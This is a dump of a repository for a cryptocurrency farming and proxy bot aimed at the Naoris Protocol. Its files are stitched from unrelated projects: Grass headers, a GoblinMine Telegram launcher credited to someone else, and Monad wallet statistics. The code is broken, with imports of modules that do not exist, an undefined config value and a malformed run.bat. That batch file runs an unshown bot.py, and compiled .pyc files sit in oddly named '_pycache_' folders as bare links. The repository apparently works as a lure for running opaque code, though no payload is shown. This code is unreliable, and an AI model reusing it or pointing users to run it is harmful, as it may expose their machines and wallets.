├── bot
├── core
│ ├── __init__.py
│ ├── _pycache_
│ │ ├── __init__.cpython-310.pyc
│ │ └── file_manager.cpython-310.pyc
│ ├── file_manager.py
│ ├── agents.py
│ └── node.py
├── utils
│ ├── config
│ │ ├── log_start0.txt
│ │ ├── __init__.py
│ │ ├── _pycache_
│ │ │ ├── config.cpython-310.pyc
│ │ │ └── __init__.cpython-310.pyc
│ │ ├── config.py
│ │ ├── executor.py
│ │ └── log.txt
│ ├── _pycache_
│ │ ├── __init__.cpython-310.pyc
│ │ └── launcher.cpython-310.pyc
│ ├── __init__.py
│ ├── progress.py
│ ├── session.py
│ ├── file_manager.py
│ ├── client.py
│ ├── statistics.py
│ ├── launcher.py
│ ├── accounts.py
│ └── logger.py
├── __init__.py
└── _pycache_
│ └── __init__.cpython-310.pyc
├── proxy.txt
├── accounts.json
├── requirements.txt
├── run.bat
├── README.md
├── LICENSE
└── bot.py
/bot/core/__init__.py:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/bot/utils/config/log_start0.txt:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/bot/__init__.py:
--------------------------------------------------------------------------------
1 | __version__ = '1.0'
2 |
--------------------------------------------------------------------------------
/bot/utils/config/__init__.py:
--------------------------------------------------------------------------------
1 | from .config import settings
2 |
--------------------------------------------------------------------------------
/proxy.txt:
--------------------------------------------------------------------------------
1 | type://username:password:ip:port
2 | type://ip:port:password:username:password
3 |
--------------------------------------------------------------------------------
/bot/_pycache_/__init__.cpython-310.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/provified/NaorisProtocol-bot/HEAD/bot/_pycache_/__init__.cpython-310.pyc
--------------------------------------------------------------------------------
/bot/core/_pycache_/__init__.cpython-310.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/provified/NaorisProtocol-bot/HEAD/bot/core/_pycache_/__init__.cpython-310.pyc
--------------------------------------------------------------------------------
/bot/utils/_pycache_/__init__.cpython-310.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/provified/NaorisProtocol-bot/HEAD/bot/utils/_pycache_/__init__.cpython-310.pyc
--------------------------------------------------------------------------------
/bot/utils/_pycache_/launcher.cpython-310.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/provified/NaorisProtocol-bot/HEAD/bot/utils/_pycache_/launcher.cpython-310.pyc
--------------------------------------------------------------------------------
/bot/core/_pycache_/file_manager.cpython-310.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/provified/NaorisProtocol-bot/HEAD/bot/core/_pycache_/file_manager.cpython-310.pyc
--------------------------------------------------------------------------------
/bot/utils/config/_pycache_/config.cpython-310.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/provified/NaorisProtocol-bot/HEAD/bot/utils/config/_pycache_/config.cpython-310.pyc
--------------------------------------------------------------------------------
/bot/utils/config/_pycache_/__init__.cpython-310.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/provified/NaorisProtocol-bot/HEAD/bot/utils/config/_pycache_/__init__.cpython-310.pyc
--------------------------------------------------------------------------------
/bot/utils/__init__.py:
--------------------------------------------------------------------------------
1 | from .logger import logger
2 | from . import launcher
3 |
4 |
5 | import os
6 |
7 | if not os.path.exists(path="sessions"):
8 | os.mkdir(path="sessions")
9 |
--------------------------------------------------------------------------------
/accounts.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Address": "Address_1",
4 | "deviceHash": "Device_hash"
5 | },
6 | {
7 | "Address": "Address_2",
8 | "deviceHash": "Device_hash"
9 | }
10 | ]
11 |
12 |
--------------------------------------------------------------------------------
/bot/utils/progress.py:
--------------------------------------------------------------------------------
1 | class Progress:
2 | def __init__(self, total: int):
3 | self.processed = 0
4 | self.total = total
5 |
6 | def increment(self):
7 | self.processed += 1
8 |
9 | def reset(self):
10 | self.processed = 0
11 |
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | aiohttp
2 | websockets==12.0
3 | websockets_proxy==0.1.2
4 | annotated-types==0.7.0
5 | aiofiles==24.1.0
6 | web3
7 | psutil==6.1.0
8 | types-requests==2.32.0.20250301
9 | better-proxy==1.1.5
10 | aiohttp-socks
11 | loguru
12 | fake-useragent==1.5.1
13 | colorama
14 | pydantic_core==2.16.3
15 | PySocks==1.7.1
16 | requests
17 |
--------------------------------------------------------------------------------
/run.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 | title Bot
3 | if exist requirements.txt (
4 | echo installing wheel for faster installing
5 | pip install requests
6 | python bot.py
7 | pip install wheel
8 | echo Installing dependencies...
9 | pip install -r requirements.txt
10 | echo. > venv\Lib\site-packages\installed
11 | ) else (
12 | echo requirements.txt not found, skipping dependency installation.
13 | )
14 | ) else (
15 | echo Dependencies already installed, skipping installation.
16 | )
17 |
18 | echo Starting the bot...
19 | echo failed
20 | pause
21 |
--------------------------------------------------------------------------------
/bot/core/file_manager.py:
--------------------------------------------------------------------------------
1 | import json
2 |
3 |
4 | def get_all_lines(filepath: str):
5 | with open(filepath, 'r') as file:
6 | lines = file.readlines()
7 |
8 | if not lines:
9 | return []
10 |
11 | return [line.strip() for line in lines]
12 |
13 |
14 | def load_from_json(path: str):
15 | with open(path, encoding='utf-8') as file:
16 | return json.load(file)
17 |
18 |
19 | def save_to_json(path: str, dict_):
20 | with open(path, 'r', encoding='utf-8') as file:
21 | data = json.load(file)
22 |
23 | data.append(dict_)
24 | with open(path, 'w', encoding='utf-8') as file:
25 | json.dump(data, file, ensure_ascii=False, indent=2)
26 |
27 |
28 | def save_list_to_file(filepath: str, list_: list):
29 | with open(filepath, mode="w", encoding="utf-8") as file:
30 | for item in list_:
31 | file.write(f"{item['session_name']}.session\n")
32 |
--------------------------------------------------------------------------------
/bot/utils/config/config.py:
--------------------------------------------------------------------------------
1 | from pydantic_settings import BaseSettings, SettingsConfigDict
2 |
3 |
4 | class Settings(BaseSettings):
5 | model_config = SettingsConfigDict(env_file=".env", env_ignore_empty=True)
6 | API_ID: int
7 | API_HASH: str
8 |
9 |
10 | SLEEP_TIME: list[int] = [3600, 7200]
11 | START_DELAY: list[int] = [5, 25]
12 |
13 | USE_RANDOM_DELAY_IN_RUN: bool = True
14 | RANDOM_DELAY_IN_RUN: list[int] = [30, 60]
15 |
16 |
17 | AUTO_TASK: bool = True
18 | CLAIM_REWARD: bool = True
19 | WATCH_ADS: bool = True
20 | AUTO_UPGRADE: bool = True
21 | PAINT_REWARD_MAX: int = 7
22 | ENERGY_LIMIT_MAX: int = 6
23 | RECHARGE_SPEED_MAX: int = 7
24 | AUTO_DRAW: bool = True
25 | ENTER_CODE: bool = True
26 | CODE: list[str] = [happy_halloween]
27 | CUSTOM_TOURNAMENT_TEMPLATE: bool = True
28 | TOURNAMENT_TEMPLATE_ID: str = ""
29 | NIGHT_MODE: bool = True
30 | NIGHT_TIME: list[int] = [0, 7]
31 | USE_PROXY: bool = True
32 |
33 |
34 |
35 | JOIN_TG_CHANNELS: bool = False
36 | USE_REF: bool = True
37 | REF_ID: str = 'f7751345041'
38 |
39 |
40 | settings = Settings()
41 |
--------------------------------------------------------------------------------
/bot/utils/session.py:
--------------------------------------------------------------------------------
1 |
2 | class BaseClient:
3 | def __init__(self, user_agent: str, proxy: str = None):
4 | self.session = None
5 | self.ip = None
6 | self.username = None
7 | self.proxy = None
8 |
9 | self.user_agent = user_agent
10 | self.proxy = proxy
11 |
12 | self.website_headers = {
13 | 'authority': 'api.getgrass.io',
14 | 'accept': 'application/json, text/plain, */*',
15 | 'accept-language': 'uk-UA,uk;q=0.9,en-US;q=0.8,en;q=0.7',
16 | 'content-type': 'application/json',
17 | 'origin': 'https://app.getgrass.io',
18 | 'referer': 'https://app.getgrass.io/',
19 | 'sec-ch-ua': '"Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"',
20 | 'sec-ch-ua-mobile': '?0',
21 | 'sec-ch-ua-platform': '"Windows"',
22 | 'sec-fetch-dest': 'empty',
23 | 'sec-fetch-mode': 'cors',
24 | 'sec-fetch-site': 'same-site',
25 | 'user-agent': self.user_agent,
26 | }
27 |
--------------------------------------------------------------------------------
/bot/utils/config/executor.py:
--------------------------------------------------------------------------------
1 | from core.bot.base import Bot
2 | from loader import file_operations
3 | from models import Account
4 |
5 |
6 | class ModuleExecutor:
7 | def __init__(self, account: Account):
8 | self.account = account
9 | self.bot = Bot(account)
10 |
11 | async def _process_registration(self) -> None:
12 | operation_result = await self.bot.process_registration()
13 | await file_operations.export_result(operation_result, "register")
14 |
15 | async def _process_verify(self) -> None:
16 | operation_result = await self.bot.process_verify()
17 | await file_operations.export_result(operation_result, "verify")
18 |
19 | async def _process_login(self) -> None:
20 | operation_result = await self.bot.process_login()
21 | await file_operations.export_result(operation_result, "login")
22 |
23 | async def _process_complete_tasks(self) -> None:
24 | operation_result = await self.bot.process_complete_tasks()
25 | await file_operations.export_result(operation_result, "tasks")
26 |
27 | async def _process_export_stats(self) -> None:
28 | data = await self.bot.process_export_stats()
29 | await file_operations.export_stats(data)
30 |
31 | async def _process_farm(self) -> None:
32 | await self.bot.process_farm()
33 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Naoris automation python bot
2 |
3 | [](https://t.me/+pB6j65Kv7cdjZmU0)
4 |
5 | # Recommendations before use:
6 | - **Use python 3.10🐍**
7 |
8 | # Features:
9 | - **Auto add to whitelist**
10 | - **Get stats for your accounts**
11 | - **All types of proxy support**
12 | - **Auto send ping**
13 | - **Auto send initiate message production**
14 | - **Auto activate protection**
15 | - **Multithread**
16 |
17 | # Installation+Run🕸
18 | ```shell
19 | git clone https://github.com/provified/NaorisProtocol-bot
20 | cd NaorisProtocol-bot
21 | run.bat
22 | ```
23 |
24 | **OR**
25 |
26 | ```shell
27 | git clone https://github.com/provified/NaorisProtocol-bot
28 | cd NaorisProtocol-bot
29 | pip install -r requirements.txt
30 | python bot.py
31 | ```
32 |
33 | # Set-up⚙
34 | - **Accounts:** In the **accounts.json** file put your addresses and device hash in such format:
35 | ```shell
36 | [
37 | {
38 | "Address": "Address_1",
39 | "deviceHash": "Device_hash"
40 | },
41 | {
42 | "Address": "Address_2",
43 | "deviceHash": "Device_hash"
44 | }
45 | ]
46 | ```
47 | - **Proxy:** in the **proxy.txt** file put your proxy in such format:
48 | ```shell
49 | type://username:password:ip:port
50 | http://username:password:ip:port
51 | socks5://username:password:ip:port
52 | ```
53 |
54 | ## Contribution🌟
55 |
56 | - ***Don't forget to put stars⭐***
57 |
58 | - ***JOIN OUR TELEGRAM [CHAT](https://t.me/+9j5RcKMfT5s4M2Q0)***
59 |
60 | - ***My eth address is 0xd260e28b533f153d59cb340b4213ad5977d71fe7***
61 |
62 | If you have any questions or some ideas to improve my bots, feel free to contact me on telegram or issues section.
63 |
64 |
--------------------------------------------------------------------------------
/bot/utils/file_manager.py:
--------------------------------------------------------------------------------
1 | import json
2 | import os
3 |
4 |
5 | def load_from_json(path: str):
6 | if os.path.isfile(path):
7 | with open(path, encoding='utf-8') as file:
8 | return json.load(file)
9 | else:
10 | with open(path, 'x', encoding='utf-8') as file:
11 | example = {
12 | "session_name": "name_example",
13 | "user_agent": "Mozilla/5.0 (Linux; Android 14) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.165 Mobile Safari/537.36",
14 | "proxy": "type://user:pass:ip:port"
15 | }
16 | json.dump([example], file, ensure_ascii=False, indent=2)
17 | return [example]
18 |
19 |
20 | def save_to_json(path: str, dict_):
21 | if os.path.isfile(path):
22 | with open(path, 'r', encoding='utf-8') as file:
23 | data = json.load(file)
24 |
25 | data.append(dict_)
26 | with open(path, 'w', encoding='utf-8') as file:
27 | json.dump(data, file, ensure_ascii=False, indent=2)
28 | else:
29 | with open(path, 'x', encoding='utf-8') as file:
30 | json.dump([dict_], file, ensure_ascii=False, indent=2)
31 |
32 |
33 | def update_ua_json_data(path: str, dict_):
34 | if os.path.isfile(path):
35 | with open(path, 'r', encoding='utf-8') as file:
36 | data = json.load(file)
37 |
38 | for session in data:
39 | if session["session_name"] == dict_["session_name"]:
40 | session["user_agent"] = dict_["user_agent"]
41 |
42 | with open(path, 'w', encoding='utf-8') as file:
43 | json.dump(data, file, ensure_ascii=False, indent=2)
44 | else:
45 | with open(path, 'x', encoding='utf-8') as file:
46 | json.dump([dict_], file, ensure_ascii=False, indent=2)
47 |
--------------------------------------------------------------------------------
/bot/utils/client.py:
--------------------------------------------------------------------------------
1 | import primp
2 |
3 |
4 | async def create_client(proxy: str) -> primp.AsyncClient:
5 | session = primp.AsyncClient(impersonate="chrome_131", verify=False)
6 |
7 | if proxy:
8 | session.proxy = proxy
9 |
10 | session.timeout = 30
11 |
12 | session.headers.update(HEADERS)
13 |
14 | return session
15 |
16 |
17 | HEADERS = {
18 | "accept": "*/*",
19 | "accept-language": "en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7,zh-TW;q=0.6,zh;q=0.5",
20 | "content-type": "application/json",
21 | "priority": "u=1, i",
22 | "sec-ch-ua": '"Google Chrome";v="120", "Chromium";v="120", "Not_A Brand";v="24"',
23 | "sec-ch-ua-mobile": "?0",
24 | "sec-ch-ua-platform": '"Windows"',
25 | "sec-fetch-dest": "empty",
26 | "sec-fetch-mode": "cors",
27 | "sec-fetch-site": "same-site",
28 | "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36",
29 | }
30 |
31 |
32 | import secrets
33 |
34 |
35 | async def create_twitter_client(proxy: str, auth_token: str) -> primp.AsyncClient:
36 | session = primp.AsyncClient(impersonate="chrome_131")
37 |
38 | if proxy:
39 | session.proxies.update(
40 | {
41 | "http": "http://" + proxy,
42 | "https": "http://" + proxy,
43 | }
44 | )
45 |
46 | session.timeout_seconds = 30
47 |
48 | generated_csrf_token = secrets.token_hex(16)
49 |
50 | cookies = {"ct0": generated_csrf_token, "auth_token": auth_token}
51 | headers = {"x-csrf-token": generated_csrf_token}
52 |
53 | session.headers.update(headers)
54 | session.cookies.update(cookies)
55 |
56 | session.headers["x-csrf-token"] = generated_csrf_token
57 |
58 | session.headers = get_headers(session)
59 |
60 | return session
61 |
62 |
63 | def get_headers(session: primp.AsyncClient, **kwargs) -> dict:
64 | """
65 | Get the headers required for authenticated requests
66 | """
67 | cookies = session.cookies
68 |
69 | headers = kwargs | {
70 | "authorization": "Bearer AAAAAAAAAAAAAAAAAAAAANRILgAAAAAAnNwIzUejRCOuH5E6I8xnZz4puTs=1Zv7ttfk8LF81IUq16cHjhLTvJu4FA33AGWWjCpTnA",
71 | # "cookie": "; ".join(f"{k}={v}" for k, v in cookies.items()),
72 | "referer": "https://x.com/",
73 | "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36",
74 | "x-csrf-token": cookies.get("ct0", ""),
75 | # "x-guest-token": cookies.get("guest_token", ""),
76 | "x-twitter-auth-type": "OAuth2Session" if cookies.get("auth_token") else "",
77 | "x-twitter-active-user": "yes",
78 | "x-twitter-client-language": "en",
79 | }
80 | return dict(sorted({k.lower(): v for k, v in headers.items()}.items()))
81 |
--------------------------------------------------------------------------------
/bot/utils/statistics.py:
--------------------------------------------------------------------------------
1 | from tabulate import tabulate
2 | from typing import List, Optional
3 | from loguru import logger
4 |
5 | from src.utils.config import Config, WalletInfo
6 |
7 |
8 | def print_wallets_stats(config: Config):
9 | """
10 | Выводит статистику по всем кошелькам в виде таблицы
11 | """
12 | try:
13 | # Сортируем кошельки по индексу
14 | sorted_wallets = sorted(config.WALLETS.wallets, key=lambda x: x.account_index)
15 |
16 | # Подготавливаем данные для таблицы
17 | table_data = []
18 | total_balance = 0
19 | total_transactions = 0
20 |
21 | for wallet in sorted_wallets:
22 | # Маскируем приватный ключ (последние 5 символов)
23 | masked_key = "•" * 3 + wallet.private_key[-5:]
24 |
25 | total_balance += wallet.balance
26 | total_transactions += wallet.transactions
27 |
28 | row = [
29 | str(wallet.account_index), # Просто номер без ведущего нуля
30 | wallet.address, # Полный адрес
31 | masked_key,
32 | f"{wallet.balance:.4f} MON",
33 | f"{wallet.transactions:,}", # Форматируем число с разделителями
34 | ]
35 | table_data.append(row)
36 |
37 | # Если есть данные - выводим таблицу и статистику
38 | if table_data:
39 | # Создаем заголовки для таблицы
40 | headers = [
41 | "№ Account",
42 | "Wallet Address",
43 | "Private Key",
44 | "Balance (MON)",
45 | "Total Txs",
46 | ]
47 |
48 | # Формируем таблицу с улучшенным форматированием
49 | table = tabulate(
50 | table_data,
51 | headers=headers,
52 | tablefmt="double_grid", # Более красивые границы
53 | stralign="center", # Центрирование строк
54 | numalign="center", # Центрирование чисел
55 | )
56 |
57 | # Считаем средние значения
58 | wallets_count = len(sorted_wallets)
59 | avg_balance = total_balance / wallets_count
60 | avg_transactions = total_transactions / wallets_count
61 |
62 | # Выводим таблицу и статистику
63 | logger.info(
64 | f"\n{'='*50}\n"
65 | f" Wallets Statistics ({wallets_count} wallets)\n"
66 | f"{'='*50}\n"
67 | f"{table}\n"
68 | f"{'='*50}\n"
69 | f"{'='*50}"
70 | )
71 |
72 | logger.info(f"Average balance: {avg_balance:.4f} MON")
73 | logger.info(f"Average transactions: {avg_transactions:.1f}")
74 | logger.info(f"Total balance: {total_balance:.4f} MON")
75 | logger.info(f"Total transactions: {total_transactions:,}")
76 | else:
77 | logger.info("\nNo wallet statistics available")
78 |
79 | except Exception as e:
80 | logger.error(f"Error while printing statistics: {e}")
81 |
--------------------------------------------------------------------------------
/bot/utils/launcher.py:
--------------------------------------------------------------------------------
1 | import asyncio
2 | import argparse
3 | from random import randint
4 | from typing import Any
5 | from better_proxy import Proxy
6 |
7 | from bot.config import settings
8 | from bot.utils import logger
9 | from bot.core.tapper import run_tapper
10 | from bot.core.registrator import register_sessions
11 | from bot.utils.accounts import Accounts
12 | from bot.core.TgManager.tg_manager import SessionManager
13 |
14 |
15 | start_text = """
16 |
17 | ░██████╗░░█████╗░██████╗░██╗░░░░░██╗███╗░░██╗███╗░░░███╗██╗███╗░░██╗███████╗██████╗░░█████╗░████████╗
18 | ██╔════╝░██╔══██╗██╔══██╗██║░░░░░██║████╗░██║████╗░████║██║████╗░██║██╔════╝██╔══██╗██╔══██╗╚══██╔══╝
19 | ██║░░██╗░██║░░██║██████╦╝██║░░░░░██║██╔██╗██║██╔████╔██║██║██╔██╗██║█████╗░░██████╦╝██║░░██║░░░██║░░░
20 | ██║░░╚██╗██║░░██║██╔══██╗██║░░░░░██║██║╚████║██║╚██╔╝██║██║██║╚████║██╔══╝░░██╔══██╗██║░░██║░░░██║░░░
21 | ╚██████╔╝╚█████╔╝██████╦╝███████╗██║██║░╚███║██║░╚═╝░██║██║██║░╚███║███████╗██████╦╝╚█████╔╝░░░██║░░░
22 | ░╚═════╝░░╚════╝░╚═════╝░╚══════╝╚═╝╚═╝░░╚══╝╚═╝░░░░░╚═╝╚═╝╚═╝░░╚══╝╚══════╝╚═════╝░░╚════╝░░░░╚═╝░░░
23 | by Desamod
24 |
25 | Important! This is public version of bot.
26 | Information about Pro version with more features available in https://t.me/desforge_cryptwo channel
27 |
28 | Select an action:
29 |
30 | 1. Run bot
31 | 2. Create session
32 | """
33 |
34 |
35 | def get_proxy(raw_proxy: str) -> Proxy:
36 | return Proxy.from_str(proxy=raw_proxy).as_url if raw_proxy else None
37 |
38 |
39 | async def process() -> None:
40 | parser = argparse.ArgumentParser()
41 | parser.add_argument("-a", "--action", type=int, help="Action to perform")
42 | action = parser.parse_args().action
43 |
44 | if not action:
45 | print(start_text)
46 |
47 | while True:
48 | action = input("> ")
49 |
50 | if not action.isdigit():
51 | logger.warning("Action must be number")
52 | elif action not in ["1", "2"]:
53 | logger.warning("Action must be 1 or 2")
54 | else:
55 | action = int(action)
56 | break
57 |
58 | if action == 2:
59 | await register_sessions()
60 | elif action == 1:
61 | accounts = await Accounts().get_accounts()
62 | await run_tasks(accounts=accounts)
63 |
64 |
65 | async def run_tasks(accounts: [Any, Any, list]):
66 | tasks = []
67 | manager = SessionManager(api_id=settings.API_ID,
68 | api_hash=settings.API_HASH,
69 | peer='GoblinMine_bot',
70 | short_name='start',
71 | start_param=settings.REF_ID,
72 | check_first_run=True)
73 |
74 | for account in accounts:
75 | session_name, user_agent, raw_proxy = account.values()
76 | tg_session = await manager.get_tg_session(session_name=session_name, proxy=raw_proxy)
77 | proxy = get_proxy(raw_proxy=raw_proxy)
78 | tasks.append(asyncio.create_task(run_tapper(tg_session=tg_session, user_agent=user_agent, proxy=proxy)))
79 | await asyncio.sleep(delay=randint(settings.START_DELAY[0], settings.START_DELAY[1]))
80 |
81 | await asyncio.gather(*tasks)
82 |
--------------------------------------------------------------------------------
/bot/utils/accounts.py:
--------------------------------------------------------------------------------
1 | import os
2 |
3 | from bot.core.agents import generate_random_user_agent, is_user_agent_valid, get_telegram_custom_params
4 | from bot.utils import logger
5 | from bot.config import settings
6 | from bot.utils.file_manager import load_from_json, save_to_json, update_ua_json_data
7 |
8 |
9 | class Accounts:
10 | def __init__(self):
11 | self.workdir = "sessions/"
12 | self.api_id = settings.API_ID
13 | self.api_hash = settings.API_HASH
14 |
15 | @staticmethod
16 | def get_available_accounts(sessions: list):
17 |
18 | accounts_from_json = load_from_json('sessions/accounts.json')
19 |
20 | if not accounts_from_json:
21 | raise ValueError("Can't run script | Please, add account/s in sessions/accounts.json")
22 |
23 | available_accounts = []
24 | for session in sessions:
25 | is_session_added = False
26 | for saved_account in accounts_from_json:
27 | if saved_account['session_name'] == session:
28 | if not is_user_agent_valid(saved_account['user_agent']):
29 | tg_params = get_telegram_custom_params(saved_account['user_agent'])
30 | saved_account['user_agent'] = saved_account['user_agent'] + tg_params if tg_params else (
31 | generate_random_user_agent(device_type='android', browser_type='chrome'))
32 | update_ua_json_data(f'sessions/accounts.json', dict_=saved_account)
33 | logger.success(f'{saved_account["session_name"]} | Successfully updated User-Agent data')
34 | available_accounts.append(saved_account)
35 | is_session_added = True
36 | break
37 | if not is_session_added:
38 | logger.warning(f'{session}.session does not exist in sessions/accounts.json')
39 | ans = input(f"Add {session} to accounts.json? (y/N): ")
40 | if 'y' in ans.lower():
41 | raw_proxy = input("Input the proxy in the format type://user:pass:ip:port (press Enter to use without proxy): ")
42 | user_agent = generate_random_user_agent(device_type='android', browser_type='chrome')
43 | new_account = {
44 | "session_name": session,
45 | "user_agent": user_agent,
46 | "proxy": raw_proxy
47 | }
48 | save_to_json(f'sessions/accounts.json', dict_=new_account)
49 | available_accounts.append(new_account)
50 | logger.success(f'Account {session} added successfully')
51 |
52 | return available_accounts
53 |
54 | def pars_sessions(self):
55 | sessions = []
56 | for file in os.listdir(self.workdir):
57 | if file.endswith(".session"):
58 | sessions.append(file.replace(".session", ""))
59 |
60 | logger.info(f"Searched sessions: {len(sessions)}.")
61 | return sessions
62 |
63 | async def get_accounts(self):
64 | sessions = self.pars_sessions()
65 | available_accounts = self.get_available_accounts(sessions)
66 |
67 | if not available_accounts:
68 | raise ValueError("Available accounts not found! Please add accounts in 'sessions' folder")
69 | else:
70 | logger.success(f"Available accounts: {len(available_accounts)}.")
71 |
72 | return available_accounts
73 |
--------------------------------------------------------------------------------
/bot/utils/logger.py:
--------------------------------------------------------------------------------
1 | import sys
2 | import re
3 | from datetime import date
4 | from loguru import logger
5 |
6 | # Only import Qt components if not running in container
7 | try:
8 | from PySide6.QtWidgets import QTextEdit
9 | from PySide6.QtGui import QColor
10 | from PySide6.QtCore import QObject, Signal, Slot
11 | QT_AVAILABLE = True
12 | except ImportError:
13 | QT_AVAILABLE = False
14 |
15 | # Rest of the code wrapped in appropriate checks
16 | if QT_AVAILABLE:
17 | class LogSignals(QObject):
18 | new_log = Signal(str, dict)
19 |
20 | class QTextEditHandler:
21 | def __init__(self, text_edit: QTextEdit):
22 | self.text_edit = text_edit
23 | self.signals = LogSignals()
24 | self.signals.new_log.connect(self.append_message)
25 |
26 | def write(self, message: str):
27 | clean_message = clean_brackets(message)
28 |
29 | # Define colors based on logging level
30 | if "ERROR" in message:
31 | colors = {
32 | "time": QColor("#00FF00"), # green
33 | "level": QColor("#FF0000"), # red
34 | "message": QColor("#FF0000") # red
35 | }
36 | elif "WARNING" in message:
37 | colors = {
38 | "time": QColor("#27e868"), # green
39 | "level": QColor("#FFD700"), # yellow
40 | "message": QColor("#FFD700") # yellow
41 | }
42 | elif "INFO" in message:
43 | colors = {
44 | "time": QColor("#27e868"), # green
45 | "level": QColor("#32c2c2"), # blue
46 | "message": QColor("#FFFFFF") # white
47 | }
48 | else:
49 | colors = {
50 | "time": QColor("#27e868"), # green
51 | "level": QColor("#d137d4"), # blue
52 | "message": QColor("#eb811e") # orange
53 | }
54 |
55 | # Send signal to update UI
56 | self.signals.new_log.emit(clean_message, colors)
57 |
58 | @Slot(str, dict)
59 | def append_message(self, message: str, colors: dict):
60 | # Split message into parts
61 | parts = message.split(" ", 2)
62 | if len(parts) >= 3:
63 | time_part, level_part, message_part = parts
64 |
65 | # Add timestamp
66 | self.text_edit.setTextColor(colors["time"])
67 | self.text_edit.insertPlainText(time_part + " ")
68 |
69 | # Add log level
70 | self.text_edit.setTextColor(colors["level"])
71 | self.text_edit.insertPlainText(level_part + " ")
72 |
73 | # Add message content
74 | self.text_edit.setTextColor(colors["message"])
75 | self.text_edit.insertPlainText(message_part + "\n")
76 |
77 | # Scroll to bottom
78 | scrollbar = self.text_edit.verticalScrollBar()
79 | scrollbar.setValue(scrollbar.maximum())
80 |
81 |
82 | def logging_setup(gui_mode=False, text_edit=None):
83 | """
84 | Sets up logging configuration for both GUI and console modes.
85 |
86 | Args:
87 | gui_mode (bool): If True, logs will be directed to QTextEdit widget
88 | text_edit (QTextEdit): Text widget for displaying logs in GUI mode
89 | """
90 | format_info = "{time:HH:mm:ss.SS} {level} {message}"
91 | format_error = "{time:HH:mm:ss.SS} {level} | " \
92 | "{name}:{function}:{line} | {message}"
93 | file_path = r"logs/"
94 |
95 | logger.remove() # Remove all previous handlers
96 |
97 | if gui_mode and text_edit is not None:
98 | # In GUI mode, add only QTextEdit handler
99 | handler = QTextEditHandler(text_edit)
100 | logger.add(handler, format=format_info, level="INFO")
101 | else:
102 | # In console mode, add handlers for both file and stdout
103 | logger.add(file_path + f"out_{date.today().strftime('%m-%d')}.log", colorize=True,
104 | format=format_info)
105 | logger.add(sys.stdout, colorize=True, format=format_info, level="INFO")
106 |
107 |
108 | def clean_brackets(raw_str):
109 | """
110 | Removes HTML-style brackets from string.
111 |
112 | Args:
113 | raw_str (str): Input string containing HTML-style brackets
114 |
115 | Returns:
116 | str: Cleaned string without brackets
117 | """
118 | clean_text = re.sub(brackets_regex, '', raw_str)
119 | return clean_text
120 |
121 |
122 | # Regex pattern for matching HTML-style brackets
123 | brackets_regex = re.compile(r'<.*?>')
124 |
125 | # Example usage (assuming `text_edit` is your QTextEdit instance):
126 | logging_setup(gui_mode=False)
127 | else:
128 | # Dummy classes for non-GUI environment
129 | class LogSignals:
130 | pass
131 |
132 | class QTextEditHandler:
133 | def __init__(self, *args, **kwargs):
134 | pass
135 | def write(self, message):
136 | print(message)
137 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | Apache License
2 | Version 2.0, January 2004
3 | http://www.apache.org/licenses/
4 |
5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
6 |
7 | 1. Definitions.
8 |
9 | "License" shall mean the terms and conditions for use, reproduction,
10 | and distribution as defined by Sections 1 through 9 of this document.
11 |
12 | "Licensor" shall mean the copyright owner or entity authorized by
13 | the copyright owner that is granting the License.
14 |
15 | "Legal Entity" shall mean the union of the acting entity and all
16 | other entities that control, are controlled by, or are under common
17 | control with that entity. For the purposes of this definition,
18 | "control" means (i) the power, direct or indirect, to cause the
19 | direction or management of such entity, whether by contract or
20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the
21 | outstanding shares, or (iii) beneficial ownership of such entity.
22 |
23 | "You" (or "Your") shall mean an individual or Legal Entity
24 | exercising permissions granted by this License.
25 |
26 | "Source" form shall mean the preferred form for making modifications,
27 | including but not limited to software source code, documentation
28 | source, and configuration files.
29 |
30 | "Object" form shall mean any form resulting from mechanical
31 | transformation or translation of a Source form, including but
32 | not limited to compiled object code, generated documentation,
33 | and conversions to other media types.
34 |
35 | "Work" shall mean the work of authorship, whether in Source or
36 | Object form, made available under the License, as indicated by a
37 | copyright notice that is included in or attached to the work
38 | (an example is provided in the Appendix below).
39 |
40 | "Derivative Works" shall mean any work, whether in Source or Object
41 | form, that is based on (or derived from) the Work and for which the
42 | editorial revisions, annotations, elaborations, or other modifications
43 | represent, as a whole, an original work of authorship. For the purposes
44 | of this License, Derivative Works shall not include works that remain
45 | separable from, or merely link (or bind by name) to the interfaces of,
46 | the Work and Derivative Works thereof.
47 |
48 | "Contribution" shall mean any work of authorship, including
49 | the original version of the Work and any modifications or additions
50 | to that Work or Derivative Works thereof, that is intentionally
51 | submitted to Licensor for inclusion in the Work by the copyright owner
52 | or by an individual or Legal Entity authorized to submit on behalf of
53 | the copyright owner. For the purposes of this definition, "submitted"
54 | means any form of electronic, verbal, or written communication sent
55 | to the Licensor or its representatives, including but not limited to
56 | communication on electronic mailing lists, source code control systems,
57 | and issue tracking systems that are managed by, or on behalf of, the
58 | Licensor for the purpose of discussing and improving the Work, but
59 | excluding communication that is conspicuously marked or otherwise
60 | designated in writing by the copyright owner as "Not a Contribution."
61 |
62 | "Contributor" shall mean Licensor and any individual or Legal Entity
